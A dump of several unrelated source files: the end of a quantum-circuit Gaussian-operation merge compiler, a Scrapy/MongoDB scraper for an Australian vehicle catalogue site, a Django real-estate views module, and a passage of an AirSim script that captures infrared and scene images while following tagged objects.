return displacement_mapping
def get_valid_gaussian_merge_ops(self, op):
"""
Obtains the valid gaussian operations that can be merged with op at the current DAG configuration.
"""
merged_gaussian_ops = []
for successor_op in self.DAG.successors(op):
# If successor operation is a Gaussian operation append to list for merging
if get_op_name(successor_op) in self.gaussian_ops:
merged_gaussian_ops.append(successor_op)
# Get displacement operations (recursively) that follow after successor operation
d_gate_successors = self.recursive_d_gate_successors(successor_op)
if d_gate_successors:
merged_gaussian_ops += d_gate_successors
# Add gaussian operations that should be executed at the same time as op.
# E.g. Rgate|q[0] Rgate|q[1] -> BS|q[0]q[1]: adds Rgate|q[1] if Rgate|q[0] is the op.
for gaussian_op in merged_gaussian_ops:
for predecessor in self.DAG.predecessors(gaussian_op):
if predecessor is op:
continue
if (
predecessor not in merged_gaussian_ops
and get_op_name(predecessor) in self.gaussian_ops
):
if self.valid_prepend_op_addition(op, predecessor, merged_gaussian_ops):
merged_gaussian_ops.append(predecessor)
merged_gaussian_ops = self.remove_invalid_operations(op, merged_gaussian_ops)
if self.is_redundant_merge(op, merged_gaussian_ops):
return []
return merged_gaussian_ops
def is_redundant_merge(self, op, merged_gaussian_ops):
"""
Helper function that determines whether the merge would do nothing, i.e. it only contains Gaussian
transforms and displacement operations.
"""
if "GaussianTransform" in get_op_name(op):
all_displacement_gates = True
for gate in merged_gaussian_ops:
if "Dgate" not in get_op_name(gate):
all_displacement_gates = False
if all_displacement_gates:
return True
return False
def non_gaussian_qumodes_dependecy(self, op):
"""
Get qumodes used in predecessor non-gaussian operations of op. Returns a list of integers,
where the number depicts the qumode index that the non-Gaussian operation operates on.
"""
for predecessor in self.DAG.predecessors(op):
if not self.is_op_gaussian_or_prep(predecessor):
return get_qumodes_operated_upon(predecessor)
return []
def organize_merge_ops(self, merged_gaussian_ops):
"""
Organize operations to be merged in order by using the order of the current operation sequence.
"""
organized_merge_operations = []
for op_in_seq in self.curr_seq:
if op_in_seq in merged_gaussian_ops:
organized_merge_operations.append(op_in_seq)
return organized_merge_operations
def is_op_gaussian_or_prep(self, op):
"""
Helper function that returns True if op is Gaussian or a preparation state else returns False.
"""
op_name = get_op_name(op)
return op_name in self.gaussian_ops or op_name in self.prep_states
def valid_prepend_op_addition(self, op, pre, merged_gaussian_ops):
"""
Helper function that ensures the predecessor operation being added to the merge list did not skip any
operations between op (the operation being merged) and pre (the predecessor of op being considered for merging).
"""
for pre_op in self.DAG.predecessors(op):
if pre_op not in merged_gaussian_ops:
pre_op_qumode = get_qumodes_operated_upon(pre_op)
if any(qumode in pre_op_qumode for qumode in get_qumodes_operated_upon(pre)):
return False
return True
def remove_invalid_operations(self, op, merged_gaussian_ops):
"""
Helper function that removes operations from merged_gaussian_ops if they are operated upon by a
non-gaussian gate beforehand.
E.g. BS | q[0],q[1] has successors Vgate | q[1] & S2gate | q[0],q[1]; in this case the S2gate is removed.
"""
op_qumodes = get_qumodes_operated_upon(op)
for gaussian_op in merged_gaussian_ops:
if any(
qumode in op_qumodes for qumode in self.non_gaussian_qumodes_dependecy(gaussian_op)
):
# Cannot merge gaussian ops that are operated upon by a non-gaussian gate beforehand.
# E.g. BS | q[0],q[1] has successors V | q[1] & S2gate | q[1],q[2]
merged_gaussian_ops.remove(gaussian_op)
return merged_gaussian_ops
```
|
{
"source": "JeyKip/autoinfo-scrapper",
"score": 3
}
|
#### File: data/abstraction/model_year_store.py
```python
from abc import ABC, abstractmethod
from autoinfo.data.abstraction import BaseStore
class ModelYearStore(BaseStore, ABC):
@abstractmethod
def find_by_model_id(self, model_id):
raise NotImplementedError
@abstractmethod
def find_by_submodel_id(self, submodel_id):
raise NotImplementedError
@abstractmethod
def find_by_model_id_and_submodel_id(self, model_id, submodel_id):
raise NotImplementedError
```
#### File: data/mongo/mongo_model_cookie_store.py
```python
from mongoengine import Document, StringField
from . import MongoBaseStore
from ..abstraction import ModelCookieStore
from ..plain import ModelCookie
class MongoModelCookie(Document):
maker_name = StringField(required=True)
model_name = StringField(required=True, unique_with="maker_name")
script_version = StringField(required=True)
cookie = StringField(required=True)
meta = {
'db_alias': 'core',
'collection': 'model_cookies'
}
class MongoModelCookieStore(ModelCookieStore, MongoBaseStore):
doc_type = MongoModelCookie
def find_by_model(self, maker_name, model_name):
return self.__find_single(maker_name=maker_name, model_name=model_name)
def get_all(self):
return [self.__create_model(x) for x in self.doc_type.objects]
def find_by_id(self, _id):
return self.__find_single(id=_id)
def __find_single(self, **kwargs):
entity = self.doc_type.objects(**kwargs).first()
model = self.__create_model(entity)
return model
# noinspection PyMethodMayBeStatic
def __create_model(self, entity: MongoModelCookie):
if not entity:
return None
return ModelCookie(entity.id, entity.maker_name, entity.model_name, entity.script_version, entity.cookie)
```
#### File: data/mongo/mongo_model_store.py
```python
from typing import List, Optional
from mongoengine import Document, StringField, IntField, ObjectIdField, BooleanField
from . import MongoBaseStore
from ..abstraction import ModelStore
from ..plain import Model
class MongoModel(Document):
maker_id = ObjectIdField(required=True)
code = StringField(required=True)
name = StringField(required=True, unique_with="maker_id")
script_version = StringField(required=True)
cookie = StringField(required=True)
submodels_handled = BooleanField(required=True, default=False)
submodels_count = IntField(required=True, default=0)
years_handled = BooleanField(required=True, default=False)
meta = {
'db_alias': 'core',
'collection': 'models',
'ordering': ['name']
}
class MongoModelStore(ModelStore, MongoBaseStore):
doc_type = MongoModel
def get_all(self) -> List[Model]:
return [self.__create_model(x) for x in self.doc_type.objects]
def find_by_id(self, _id) -> Optional[Model]:
entity = self.doc_type.objects(id=_id).first()
model = self.__create_model(entity)
return model
def find_by_maker_id(self, maker_id) -> List[Model]:
return [self.__create_model(x) for x in self.doc_type.objects(maker_id=maker_id)]
def turn_on_years_handled_flag(self, model_id):
self.doc_type.objects(id=model_id).update_one(set__years_handled=True)
# noinspection PyMethodMayBeStatic
def __create_model(self, entity: MongoModel):
if not entity:
return None
return Model(
_id=entity.id, maker_id=entity.maker_id, model_code=entity.code, model_name=entity.name,
script_version=entity.script_version, cookie=entity.cookie, submodels_handled=entity.submodels_handled,
submodels_count=entity.submodels_count, years_handled=entity.years_handled
)
```
#### File: data/plain/entity.py
```python
class Entity:
def __init__(self, _id=None):
self.id = _id
```
#### File: autoinfo/decoders/request_decoder.py
```python
from .constants import HEX_SUBSTITUTION_SYMBOLS, ZERO_ASCII_CODE
from .hex_decoder import HexDecoder
# noinspection PyMethodMayBeStatic
class RequestDecoder:
def __init__(self):
self.__hex_decoder = HexDecoder()
def decode(self, value):
original_hex_query = self.__replace_substitutions_with_original_symbols(value)
original_query = self.__hex_decoder.from_hex_to_string(original_hex_query)
return original_query
def __replace_substitutions_with_original_symbols(self, value):
result = []
for i in range(len(value) - 1, -1, -1):
index_in_substitutions = HEX_SUBSTITUTION_SYMBOLS.index(value[i])
symbol_ascii_code = index_in_substitutions + ZERO_ASCII_CODE
original_symbol = chr(symbol_ascii_code)
result.append(original_symbol)
return "".join(result)
```
#### File: autoinfo/services/auto_details_service.py
```python
from collections import defaultdict
from typing import List, Dict
from autoinfo.data.abstraction import MakerStore, ModelStore, SubModelStore, ModelCookieStore, ModelYearStore, \
SeriesStore, ModelSeriesStore, EngineStore, ModelEngineStore
from autoinfo.data.plain import Maker, Entity, Model, SubModel, ModelCookie, ModelYear, Series, ModelSeries, Engine, \
ModelEngine
from autoinfo.decoders import HexDecoder
class AutoDetailsService:
def __init__(self, maker_store: MakerStore, models_store: ModelStore, submodel_store: SubModelStore,
model_cookie_store: ModelCookieStore, model_year_store: ModelYearStore, series_store: SeriesStore,
model_series_store: ModelSeriesStore, engine_store: EngineStore, model_engine_store: ModelEngineStore):
self.__maker_store = maker_store
self.__models_store = models_store
self.__submodel_store = submodel_store
self.__model_cookie_store = model_cookie_store
self.__model_year_store = model_year_store
self.__series_store = series_store
self.__model_series_store = model_series_store
self.__engine_store = engine_store
self.__model_engine_store = model_engine_store
self.__hex_decoder = HexDecoder()
def save_makers(self, makers: List[Maker]):
existing_makers = self.__maker_store.get_all()
makers_to_save = self.__filter_entities_to_save(existing_makers, makers, lambda maker: maker.name)
self.__maker_store.save(makers_to_save)
def load_makers(self) -> List[Maker]:
return self.__maker_store.get_all()
def load_makers_dict(self) -> Dict[str, Maker]:
return {maker.id: maker for maker in self.load_makers()}
def save_models(self, maker_name: str, models: List[Model]):
maker = self.__maker_store.find_by_name(maker_name)
existing_models = self.__models_store.find_by_maker_id(maker.id)
models = models or []
for model in models:
model.maker_id = maker.id
models_to_save = self.__filter_entities_to_save(existing_models, models,
lambda entity: (entity.maker_id, entity.name))
new_models_count = len(list(filter(lambda item: not item.id, models_to_save)))
if models_to_save:
self.__models_store.save(models_to_save)
if new_models_count:
self.__maker_store.change_handled_models_count(maker.id, new_models_count)
def load_models(self) -> List[Model]:
return self.__models_store.get_all()
def load_models_for_maker(self, maker_id):
return self.__models_store.find_by_maker_id(maker_id)
def load_models_dict(self) -> Dict[str, Model]:
return {model.id: model for model in self.load_models()}
def save_submodels(self, model_id: str, submodels: List[SubModel]):
model = self.__models_store.find_by_id(model_id)
existing_submodels = self.__submodel_store.find_by_model_id(model_id)
submodels = submodels or []
for sm in submodels:
sm.model_id = model_id
submodels_to_save = self.__filter_entities_to_save(existing_submodels, submodels,
lambda entity: (entity.model_id, entity.name))
model.submodels_handled = True
model.submodels_count = len(submodels_to_save)
self.__submodel_store.save(submodels_to_save)
self.__models_store.save(model)
def load_submodels(self) -> List[SubModel]:
return self.__submodel_store.get_all()
def load_submodels_dict(self) -> Dict[str, SubModel]:
return {sub.id: sub for sub in self.__submodel_store.get_all()}
def load_submodels_by_model_id_dict(self) -> Dict[str, List[SubModel]]:
result = defaultdict(list)
for sub in self.load_submodels():
result[sub.model_id].append(sub)
return result
def get_submodel_properties_or_default(self, submodel: SubModel = None):
if submodel:
return submodel.id, submodel.code
else:
return None, self.__hex_decoder.convert_to_hex_string("ALL")
def save_years(self, model_id: str, submodel_id: str, years: List[int]):
if not model_id:
raise ValueError("model_id is required parameter for save_years method.")
existing_model_years = self.load_years_for_model(model_id, submodel_id)
model_years = [ModelYear(model_id=model_id, submodel_id=submodel_id, year=year) for year in years or []]
model_years_to_save = self.__filter_entities_to_save(
existing_model_years, model_years,
lambda entity: (entity.model_id, entity.submodel_id, entity.year)
)
if model_years_to_save:
self.__model_year_store.save(model_years_to_save)
if submodel_id:
self.__submodel_store.turn_on_years_handled_flag(submodel_id)
else:
self.__models_store.turn_on_years_handled_flag(model_id)
def save_model_cookie(self, maker_name, model_name, script_version, cookie):
existing_cookie = self.__model_cookie_store.find_by_model(maker_name, model_name)
if existing_cookie:
existing_cookie.script_version = script_version
existing_cookie.cookie = cookie
self.__model_cookie_store.save(existing_cookie)
else:
self.__model_cookie_store.save(ModelCookie(
maker_name=maker_name, model_name=model_name,
script_version=script_version, cookie=cookie
))
def get_cookie_for_model(self, maker_name, model_name) -> ModelCookie:
return self.__model_cookie_store.find_by_model(maker_name, model_name)
def set_maker_models_count(self, maker_id, models_count):
self.__maker_store.set_models_count(maker_id, models_count)
def load_years(self) -> List[ModelYear]:
return self.__model_year_store.get_all()
def load_years_for_model(self, model_id, submodel_id):
if not model_id:
raise ValueError("model_id is required parameter.")
if not submodel_id:
return self.__model_year_store.find_by_model_id(model_id)
else:
return self.__model_year_store.find_by_model_id_and_submodel_id(model_id, submodel_id)
def save_series(self, model_id, submodel_id, year_id, series_list: List[Series]):
if not model_id:
raise ValueError("model_id is required parameter.")
if not year_id:
raise ValueError("year_id is required parameter.")
self.__save_series(series_list)
self.__save_model_series(model_id, submodel_id, year_id, series_list)
def __save_series(self, series_list: List[Series]):
series_to_save = [item for item in series_list if
not self.__series_store.find_by_series_and_chassis(item.series, item.chassis)]
if series_to_save:
self.__series_store.save(series_to_save)
def __save_model_series(self, model_id, submodel_id, year_id, series_list: List[Series]):
model_year = self.__model_year_store.find_by_id(year_id)
model_series_to_save = []
for series in series_list:
series_entity = self.__series_store.find_by_series_and_chassis(series.series, series.chassis)
model_series_entity = self.__model_series_store.find_by_unique_key(model_id, submodel_id, series_entity.id,
model_year.year)
if not model_series_entity:
model_series = ModelSeries(model_id=model_id, submodel_id=submodel_id, series_id=series_entity.id,
year=model_year.year)
model_series_to_save.append(model_series)
if model_series_to_save:
self.__model_series_store.save(model_series_to_save)
model_year.series_handled = True
self.__model_year_store.save(model_year)
def load_series(self) -> List[Series]:
return self.__series_store.get_all()
def load_series_dict(self) -> Dict[str, Series]:
return {item.id: item for item in self.load_series()}
def load_model_series(self) -> List[ModelSeries]:
return self.__model_series_store.get_all()
def save_engines(self, model_id, submodel_id, year, model_series_id, engines_list: List[Engine]):
if not model_id:
raise ValueError("model_id is required parameter.")
if not year:
raise ValueError("year is required parameter.")
if not model_series_id:
raise ValueError("series_id is required parameter.")
self.__save_engines(engines_list)
self.__save_model_engines(model_id, submodel_id, year, model_series_id, engines_list)
def __save_engines(self, engines_list: List[Engine]):
engines_to_save = [item for item in engines_list if
not self.__engine_store.find_by_unique_key(item.code, item.name)]
if engines_to_save:
self.__engine_store.save(engines_to_save)
def __save_model_engines(self, model_id, submodel_id, year, model_series_id, engines_list: List[Engine]):
model_series = self.__model_series_store.find_by_id(model_series_id)
model_engines_to_save = []
for engine in engines_list:
engine_entity = self.__engine_store.find_by_unique_key(engine.code, engine.name)
model_engine_entity = self.__model_engine_store.find_by_unique_key(
model_id, submodel_id, model_series.series_id, engine_entity.id, year
)
if not model_engine_entity:
model_engine = ModelEngine(
model_id=model_id, submodel_id=submodel_id, series_id=model_series.series_id,
engine_id=engine_entity.id, year=year
)
model_engines_to_save.append(model_engine)
if model_engines_to_save:
self.__model_engine_store.save(model_engines_to_save)
model_series.engines_handled = True
self.__model_series_store.save(model_series)
# noinspection PyMethodMayBeStatic
def __filter_entities_to_save(self, existing_entities: List[Entity], entities_to_save: List[Entity],
unique_key_supplier):
if not unique_key_supplier or not callable(unique_key_supplier):
raise ValueError("unique_key_supplier is required and should be a callable object.")
existing_entities = existing_entities or []
entities_to_save = entities_to_save or []
existing_entities_by_id_dict = {}
existing_entities_by_unique_key_dict = {}
for entity in existing_entities:
existing_entities_by_id_dict[entity.id] = entity
existing_entities_by_unique_key_dict[unique_key_supplier(entity)] = entity
filtered_entities = []
for entity in entities_to_save:
key = unique_key_supplier(entity)
if entity.id:
if entity.id in existing_entities_by_id_dict:
if key not in existing_entities_by_unique_key_dict:
filtered_entities.append(entity)
else:
existing_entity = existing_entities_by_unique_key_dict[key]
if existing_entity.id == entity.id:
filtered_entities.append(entity)
elif key not in existing_entities_by_unique_key_dict:
filtered_entities.append(entity)
return filtered_entities
```
#### File: src/autoinfo/utils.py
```python
import traceback
def get_value_safely(key, dictionary, value_type=str):
try:
if key in dictionary:
return value_type(dictionary[key])
return None
except Exception as error:
traceback.print_tb(error.__traceback__)
return None
```
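A quick illustration of the helper's behaviour with typed casts and missing keys (the dictionary below is made up):
```python
config = {"MONGO_PORT": "27017", "MONGO_HOST": "localhost"}

print(get_value_safely("MONGO_PORT", config, int))  # 27017, cast to int
print(get_value_safely("MONGO_HOST", config))       # 'localhost', default str type
print(get_value_safely("MONGO_USER", config))       # None, key is absent
```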
#### File: autoinfo-scrapper/src/main.py
```python
import os
from dotenv import dotenv_values
from scrapy.crawler import CrawlerProcess
from scrapy.utils.project import get_project_settings
from twisted.internet.defer import inlineCallbacks
from autoinfo.cookie import CookieProvider
from autoinfo.data.mongo import MongoConnector, MongoConnectionSettings, MongoMakerStore, MongoModelStore, \
MongoSubModelStore, MongoModelCookieStore, MongoModelYearStore, MongoSeriesStore, MongoModelSeriesStore, \
MongoEngineStore, MongoModelEngineStore
from autoinfo.services import AutoDetailsService
from autoinfo.utils import get_value_safely
from scrapper.scrapper.spiders import AutoInfoSeriesSpider, AutoInfoMakersSpider, AutoInfoModelsSpider, \
AutoInfoSubModelsSpider, AutoInfoYearsSpider, AutoInfoEnginesSpider
def start_scrapping():
with MongoConnector() as connector:
config = dotenv_values(".env")
settings = [
MongoConnectionSettings(
get_value_safely("MONGO_CONNECTION_ALIAS", config),
get_value_safely("MONGO_DATABASE", config),
get_value_safely("MONGO_AUTH_USERNAME", config),
get_value_safely("MONGO_AUTH_PASSWORD", config),
get_value_safely("MONGO_HOST", config),
get_value_safely("MONGO_PORT", config, int),
get_value_safely("MONGO_AUTH_DATABASE", config)
)
]
connector.create_connections(settings)
# create concrete stores
maker_store = MongoMakerStore()
models_store = MongoModelStore()
submodels_store = MongoSubModelStore()
model_cookies_store = MongoModelCookieStore()
model_years_store = MongoModelYearStore()
series_store = MongoSeriesStore()
model_series_store = MongoModelSeriesStore()
engine_store = MongoEngineStore()
model_engine_store = MongoModelEngineStore()
# create services
auto_details_service = AutoDetailsService(maker_store, models_store, submodels_store, model_cookies_store,
model_years_store, series_store, model_series_store, engine_store,
model_engine_store)
# create utils classes
cookie_provider = CookieProvider()
process = create_crawler_process(auto_details_service)
# We should run all these spiders consequently because:
# 1) Each of them depends on the results of running previous one
# 2) It also gives us flexibility to run only some particular spiders to crawl only required information.
# Since lists of makers, models and years are changed rarely we don't need to load them every time
# we run this scrapper. So we can make some sort of tasks which can be stored in a database and run spiders
# based on them. Or we just can comment out some of them at some time and run only required one to update
# only information which we need to update right now.
@inlineCallbacks
def run_spiders():
base_api_url = "https://online.autoinfo.com.au/oscar/Aut01nf0iiqq4/a"
yield process.crawl(AutoInfoMakersSpider, auto_details_service, cookie_provider, base_api_url)
yield process.crawl(AutoInfoModelsSpider, auto_details_service, cookie_provider, base_api_url)
yield process.crawl(AutoInfoSubModelsSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoYearsSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoSeriesSpider, auto_details_service, base_api_url)
yield process.crawl(AutoInfoEnginesSpider, auto_details_service, base_api_url)
run_spiders()
process.start()
def create_crawler_process(auto_details_service):
# we need to specify a custom module name where to take overridden settings from
os.environ.setdefault('SCRAPY_SETTINGS_MODULE', "scrapper.scrapper.settings")
settings = get_project_settings()
# we need to extend settings with passing custom objects to be able to inject them into pipelines
settings.set("AUTO_DETAILS_SERVICE", auto_details_service)
process = CrawlerProcess(settings)
return process
if __name__ == "__main__":
start_scrapping()
```
#### File: scrapper/pipelines/save_item_to_database.py
```python
from autoinfo.services import AutoDetailsService
from scrapper.scrapper.items import MakersListItem, ModelsListItem, SubModelsListItem, YearsListItem, \
MakerModelsCountItem, SeriesListItem, EnginesListItem
class SaveItemToDatabasePipeline:
def __init__(self, auto_details_service: AutoDetailsService):
self.__auto_details_service = auto_details_service
self.__handlers = {
MakersListItem.__name__: self.__handle_makers_list_item,
ModelsListItem.__name__: self.__handle_models_list_item,
SubModelsListItem.__name__: self.__handle_submodels_list_item,
YearsListItem.__name__: self.__handle_years_list_item,
MakerModelsCountItem.__name__: self.__set_maker_models_count,
SeriesListItem.__name__: self.__handle_series_list_item,
EnginesListItem.__name__: self.__handle_engines_list_item,
}
@classmethod
def from_crawler(cls, crawler):
return cls(
auto_details_service=crawler.settings.get('AUTO_DETAILS_SERVICE')
)
def process_item(self, item, spider):
cls_name = item.__class__.__name__
if cls_name in self.__handlers:
self.__handlers[cls_name](item)
def __handle_makers_list_item(self, item):
self.__auto_details_service.save_makers(item["makers"])
def __handle_models_list_item(self, item):
self.__auto_details_service.save_models(item["maker_name"], item["models"])
def __handle_submodels_list_item(self, item):
self.__auto_details_service.save_submodels(item["model_id"], item["submodels"])
def __handle_years_list_item(self, item):
self.__auto_details_service.save_years(item["model_id"], item["submodel_id"], item["years"])
def __set_maker_models_count(self, item):
self.__auto_details_service.set_maker_models_count(item["maker_id"], item["models_count"])
def __handle_series_list_item(self, item):
self.__auto_details_service.save_series(item["model_id"], item["submodel_id"], item["year_id"], item["series"])
def __handle_engines_list_item(self, item):
self.__auto_details_service.save_engines(item["model_id"], item["submodel_id"], item["year"],
item["model_series_id"], item["engines"])
```
#### File: scrapper/spiders/autoinfo_cookie_base_spider.py
```python
from autoinfo.cookie import CookieProvider
from autoinfo.services import AutoDetailsService
from scrapper.scrapper.spiders import AutoInfoBaseSpider
class AutoInfoCookieBaseSpider(AutoInfoBaseSpider):
def __init__(self, auto_details_service: AutoDetailsService, cookie_provider: CookieProvider, base_url: str,
**kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__cookie_provider = cookie_provider
self.__refresh_cookie()
def __refresh_cookie(self):
self.__cookie = self.__cookie_provider.get_cookie()
@property
def cookie_provider(self):
return self.__cookie_provider
@property
def script_version(self):
return self.__cookie.script_version
@property
def cookie(self):
return self.__cookie.cookie
def create_basic_request_builder(self):
request_builder = super().create_basic_request_builder()
request_builder.add_params({
"scriptVersion": self.script_version,
"cookie": self.cookie,
})
return request_builder
```
#### File: scrapper/spiders/autoinfo_series_spider.py
```python
import random
from typing import List
from scrapy import Request
from autoinfo.data.plain import Model, Maker, SubModel, Series, ModelYear
from autoinfo.services import AutoDetailsService
from . import AutoInfoBaseSpider
from .parsers import SeriesResponseParser
from ..items import SeriesListItem
class AutoInfoSeriesSpider(AutoInfoBaseSpider):
name = 'autoinfo-series-spider'
def __init__(self, auto_details_service: AutoDetailsService, base_url: str, **kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__series_parsed = 0
self.__parser = SeriesResponseParser(self.logger)
def start_requests(self):
makers = self.auto_details_service.load_makers_dict()
models = self.auto_details_service.load_models_dict()
submodels = self.auto_details_service.load_submodels_dict()
years = self.auto_details_service.load_years()
# we need to shuffle years to prevent using the same cookie value
# from the same model in multiple subsequent requests
shuffled_indexes = random.sample([i for i in range(len(years))], len(years))
for index in shuffled_indexes:
year = years[index]
if not year.series_handled:
submodel = submodels[year.submodel_id] if year.submodel_id else None
model = models[year.model_id]
maker = makers[model.maker_id]
yield self.__create_download_series_request(maker, model, year, submodel)
def __create_download_series_request(self, maker: Maker, model: Model, year_info: ModelYear, submodel: SubModel):
sub_id, sub_code = self.auto_details_service.get_submodel_properties_or_default(submodel)
request_builder = self.create_basic_request_builder()
request_builder.add_params({
"scriptVersion": model.script_version,
"cookie": model.cookie,
"0": "series",
"1": maker.name,
"2": model.code,
"3": sub_code,
"4": year_info.year
})
request_url = request_builder.build()
return Request(request_url, lambda response: self.__parse_series(model.id, sub_id, year_info.id, response))
def __parse_series(self, model_id, submodel_id, year_id, response):
self.logger.debug(f"#{self.__series_parsed + 1}. Got '{response.text}' for model_id='{model_id}',"
f" submodel_id='{submodel_id}', year_id='{year_id}'.")
decoded_response_text = self.decode_response_if_successful(response)
series: List[Series] = self.__parser(decoded_response_text)
self.__series_parsed += 1
yield SeriesListItem(model_id=model_id, submodel_id=submodel_id, year_id=year_id, series=series)
```
#### File: scrapper/spiders/autoinfo_submodels_spider.py
```python
from typing import List
from scrapy import Request
from autoinfo.data.plain import Model, Maker, SubModel
from autoinfo.services import AutoDetailsService
from . import AutoInfoBaseSpider
from .parsers import SubModelsResponseParser
from ..items import SubModelsListItem
class AutoInfoSubModelsSpider(AutoInfoBaseSpider):
name = 'autoinfo-submodels-spider'
def __init__(self, auto_details_service: AutoDetailsService, base_url: str, **kwargs):
super().__init__(auto_details_service, base_url, **kwargs)
self.__parser = SubModelsResponseParser(self.logger)
def start_requests(self):
makers = self.auto_details_service.load_makers_dict()
for model in self.auto_details_service.load_models():
if not model.submodels_handled:
yield self.__create_download_submodels_request(makers[model.maker_id], model)
def __create_download_submodels_request(self, maker: Maker, model: Model):
request_builder = self.create_basic_request_builder()
request_builder.add_params({
"scriptVersion": model.script_version,
"cookie": model.cookie,
"0": "submodel",
"1": maker.name,
"2": model.code
})
request_url = request_builder.build()
return Request(request_url, lambda response: self.__parse_submodels(model.id, response))
def __parse_submodels(self, model_id, response):
decoded_response_text = self.decode_response_if_successful(response)
submodels_list: List[SubModel] = self.__parser(decoded_response_text)
yield SubModelsListItem(model_id=model_id, submodels=submodels_list)
```
#### File: spiders/parsers/models_response_parser.py
```python
import json
from typing import List
from autoinfo.data.plain import Model
class ModelsResponseParser:
def __init__(self, logger):
self.__logger = logger
def __call__(self, decoded_response_text: str, *args, **kwargs):
models_data = json.loads(f"[{decoded_response_text}]")
models_list_item = self.__parse_models(models_data)
return models_list_item
# noinspection PyMethodMayBeStatic
def __parse_models(self, models_data):
handled_models = set()
models: List[Model] = []
for code, name in models_data:
if name not in ['- Popular Models -', '- All Models -'] and code not in handled_models:
handled_models.add(code)
models.append(Model(model_code=code, model_name=name))
return models
```
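The parser expects the decoded payload to be a comma-separated list of ``[code, name]`` pairs without the enclosing brackets (the parser adds them before ``json.loads``). A tiny illustration with a made-up payload:
```python
import logging

parser = ModelsResponseParser(logging.getLogger(__name__))
payload = '["CRL","Corolla"],["CMR","Camry"],["0","- All Models -"]'
models = parser(payload)
print(len(models))  # 2 -- the '- All Models -' placeholder row is dropped
```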
#### File: spiders/parsers/submodels_response_parser.py
```python
import json
from autoinfo.data.plain import SubModel
class SubModelsResponseParser:
def __init__(self, logger):
self.__logger = logger
def __call__(self, decoded_response_text: str, *args, **kwargs):
submodels_data = json.loads(f"[{decoded_response_text}]")
submodels_list = [SubModel(code=code, name=name) for code, name in submodels_data if
name != "ALL" and code and name]
return submodels_list
```
|
{
"source": "jeylani99/Real-Estate",
"score": 2
}
|
#### File: jeylani99/Real-Estate/views.py
```python
from django.shortcuts import render
from django.views import generic
from .models import Location,Property
# Create your views here.
class IndexView(generic.ListView):
template_name = 'homesapp/index.html'
def get_queryset(self):
return Location.objects.all()
class LocationView(generic.DetailView):
model = Location
template_name = 'homesapp/locationview.html'
class PropertyView(generic.DetailView):
model = Property
template_name = 'homesapp/propertyview.html'
```
|
{
"source": "jeyong/AirSim",
"score": 3
}
|
#### File: PythonClient/computer_vision/capture_ir_segmentation.py
```python
import numpy
import cv2
import time
import sys
import os
import random
import glob
from airsim import *
def get_image(x, y, z, pitch, roll, yaw, client):
"""
title::
get_image
description::
Capture images (as numpy arrays) from a certain position.
inputs::
x
x position in meters
y
y position in meters
z
altitude in meters; remember NED, so should be negative to be
above ground
pitch
angle (in radians); in computer vision mode, this is camera angle
roll
angle (in radians)
yaw
angle (in radians)
client
connection to AirSim (e.g., client = MultirotorClient() for UAV)
returns::
position
AirSim position vector (access values with x_val, y_val, z_val)
angle
AirSim quaternion ("angles")
im
segmentation or IR image, depending upon palette in use (3 bands)
imScene
scene image (3 bands)
author::
<NAME>
<NAME>
"""
#Set pose and sleep after to ensure the pose sticks before capturing image.
client.simSetVehiclePose(Pose(Vector3r(x, y, z), \
to_quaternion(pitch, roll, yaw)), True)
time.sleep(0.1)
#Capture segmentation (IR) and scene images.
responses = \
client.simGetImages([ImageRequest("0", ImageType.Infrared,
False, False),
ImageRequest("0", ImageType.Scene, \
False, False),
ImageRequest("0", ImageType.Segmentation, \
False, False)])
#Change images into numpy arrays.
img1d = numpy.fromstring(responses[0].image_data_uint8, dtype=numpy.uint8)
im = img1d.reshape(responses[0].height, responses[0].width, 4)
img1dscene = numpy.fromstring(responses[1].image_data_uint8, dtype=numpy.uint8)
imScene = img1dscene.reshape(responses[1].height, responses[1].width, 4)
return Vector3r(x, y, z), to_quaternion(pitch, roll, yaw),\
im[:,:,:3], imScene[:,:,:3] #get rid of alpha channel
def main(client,
objectList,
pitch=numpy.radians(270), #image straight down
roll=0,
yaw=0,
z=-122,
writeIR=False,
writeScene=False,
irFolder='',
sceneFolder=''):
"""
title::
main
description::
Follow objects of interest and record images while following.
inputs::
client
connection to AirSim (e.g., client = MultirotorClient() for UAV)
objectList
list of tag names within the AirSim environment, corresponding to
objects to follow (add tags by clicking on object, going to
Details, Actor, and Tags, then add component)
pitch
angle (in radians); in computer vision mode, this is camera angle
roll
angle (in radians)
yaw
angle (in radians)
z
altitude in meters; remember NED, so should be negative to be
above ground
writeIR, writeScene
if True, write out the IR or scene images, respectively
irFolder, sceneFolder
path prefixes used when writing the IR and scene image files
author::
<NAME>
"""
i = 0
for o in objectList:
startTime = time.time()
currentTime = time.time() - startTime
        pose = client.simGetObjectPose(o)
#Capture images for a certain amount of time in seconds (half hour now)
while currentTime < 1800:
#Capture image - pose.position x_val access may change w/ AirSim
#version (pose.position.x_val new, pose.position[b'x_val'] old)
vector, angle, ir, scene = get_image(pose.position.x_val,
pose.position.y_val,
z,
pitch,
roll,
yaw,
client)
#Convert color scene image to BGR for write out with cv2.
r,g,b = cv2.split(scene)
scene = cv2.merge((b,g,r))
if writeIR:
cv2.imwrite(irFolder+'ir_'+str(i).zfill(5)+'.png', ir)
if writeScene:
cv2.imwrite(sceneFolder+'scene_'+str(i).zfill(5)+'.png',
scene)
i += 1
currentTime = time.time() - startTime
            pose = client.simGetObjectPose(o)
if __name__ == '__main__':
#Connect to AirSim, UAV mode.
client = MultirotorClient()
client.confirmConnection()
    #Tags for poachers in each of the three groups in the Africa environment.
objectList = ['Poacher1A', 'Poacher1B', 'Poacher1C']
    #Sample calls to main, varying camera angle and altitude. Note that main()
    #takes separate irFolder/sceneFolder arguments, and writeIR/writeScene must
    #be True for the captured images to actually be written to disk.
#straight down, 400ft
main(client,
objectList,
         irFolder='auto\\winter\\400ft\\down\\ir\\',
         sceneFolder='auto\\winter\\400ft\\down\\scene\\')
#straight down, 200ft
main(client,
objectList,
z=-61,
         irFolder='auto\\winter\\200ft\\down\\ir\\',
         sceneFolder='auto\\winter\\200ft\\down\\scene\\')
    #45 degrees, 200ft -- note that often the object won't be seen since the
    #position is set exactly to the object's
main(client,
objectList,
z=-61,
pitch=numpy.radians(315),
         irFolder='auto\\winter\\200ft\\45\\ir\\',
         sceneFolder='auto\\winter\\200ft\\45\\scene\\')
    #45 degrees, 400ft -- note that often the object won't be seen since the
    #position is set exactly to the object's
main(client,
objectList,
pitch=numpy.radians(315),
